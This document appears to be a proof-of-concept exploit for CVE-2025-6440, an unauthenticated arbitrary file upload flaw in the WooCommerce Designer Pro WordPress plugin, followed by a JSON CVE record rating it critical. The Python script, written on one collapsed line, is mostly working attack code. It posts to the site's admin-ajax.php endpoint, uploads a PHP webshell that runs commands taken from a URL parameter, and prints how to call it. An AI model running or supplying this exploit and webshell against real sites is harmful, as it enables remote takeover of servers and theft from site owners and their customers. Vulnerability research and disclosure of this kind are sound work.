CVE-2025-6440

import requests import sys # CVE-2025-6440 PoC - Arbitrary File Upload in WooCommerce Designer Pro # Target: WordPress site with WooCommerce Designer Pro plugin <= 1.9.26 def exploit(target_url, file_content=None): """ Exploit arbitrary file upload vulnerability """ if file_content is None: # Default webshell content file_content = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' target = target_url.rstrip('/') upload_url = f"{target}/wp-admin/admin-ajax.php" # Construct malicious file upload request files = { 'action': (None, 'wcdp_save_canvas_design_ajax'), 'wcdp_canvas_data': (None, 'test'), 'wcdp_upload_file': ('shell.php', file_content, 'application/x-php') } data = { 'action': 'wcdp_save_canvas_design_ajax', 'wcdp_canvas_id': '1' } print(f"[*] Targeting: {target}") print(f"[*] Uploading malicious file...") try: response = requests.post(upload_url, data=data, files=files, timeout=10) if response.status_code == 200: print("[+] File upload request sent successfully") print(f"[*] Check for uploaded shell at: {target}/wp-content/uploads/wcdp/shell.php") print(f"[*] Execute command: {target}/wp-content/uploads/wcdp/shell.php?cmd=whoami") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-6440", "sourceIdentifier": "[email protected]", "published": "2025-10-24T08:15:34.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooCommerce Designer Pro plugin for WordPress, used by the Pricom - Printing Company & Design Services WordPress theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'wcdp_save_canvas_design_ajax' function in all versions up to, and including, 1.9.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2f8da1-7503-45e3-8a7d-0031ce264edf?source=cve", "source": "[email protected]"}]}}